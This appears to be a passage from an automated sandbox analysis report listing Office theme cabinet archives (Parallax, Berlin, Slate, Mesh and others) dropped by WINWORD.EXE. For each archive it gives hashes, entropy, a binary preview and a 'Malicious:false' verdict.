                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):550906
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998289614787931
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                                                                                                                                                                                                                                                                          MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):230916
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.994759087207758
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                                                                                                                                                                                                                                                                          MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):698244
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997838239368002
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                                                                                                                                                                                                                                                                          MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                                                                                                                                                                                                                                                                          SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1065873
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998277814657051
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                                                                                                                                                                                                                                                                          MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                                                                                                                                                                                                                                                                          SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):640684
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99860205353102
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                                                                                                                                                                                                                                                                          MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                                                                                                                                                                                                                                                                          SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1097591
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99825462915052
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                                                                                                                                                                                                                                                                          MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):953453
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99899040756787
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                                                                                                                                                                                                                                                                          MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1310275
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9985829899274385
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                                                                                                                                                                                                                                                                          MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1881952
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999066394602922
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                                                                                                                                                                                                                                                                          MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1766185
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9991290831091115
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                                                                                                                                                                                                                                                                          MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2591108
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999030891647433
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                                                                                                                                                                                                                                                                          MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
